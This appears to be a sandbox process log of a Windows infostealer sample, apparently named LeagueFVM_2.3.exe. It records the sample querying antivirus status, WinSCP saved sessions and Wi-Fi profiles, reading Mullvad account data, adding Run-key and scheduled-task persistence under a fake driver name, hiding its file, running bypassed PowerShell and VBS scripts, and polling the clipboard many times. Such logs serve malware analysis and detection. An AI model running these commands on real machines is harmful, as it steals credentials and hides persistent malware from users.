C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\qVFxMPFEMPsS_tezmp.ps1""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\qVFxMPFEMPsS_tezmp.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function Get-AntiVirusProduct {
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupO0k1mr /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\LeagueFVM_2.3.exe /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupO0k1mr /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\LeagueFVM_2.3.exe\" /F /rl highest"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupO0k1mr /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\LeagueFVM_2.3.exe /f
C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupO0k1mr /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\LeagueFVM_2.3.exe\" /F /rl highest
C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn WindowsDriverSetupO0k1mr /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\LeagueFVM_2.3.exe\" /F /rl highest
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\LeagueFVM_2.3.exe\"""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\LeagueFVM_2.3.exe\""
C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\LeagueFVM_2.3.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\LeagueFVM_2.3.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\B6oH2b5ScvRb.vbs"
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\AppData\Roaming\B6oH2b5ScvRb.vbs
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut9VvRW.ps1" -RunAsAdministrator"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut9VvRW.ps1" -RunAsAdministrator
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\GooseDesktop.exe""
C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\GooseDesktop.exe
"C:\Users\Admin\AppData\Local\Temp\Yfb\EvilGoose\hg\GooseDesktop.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004F0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
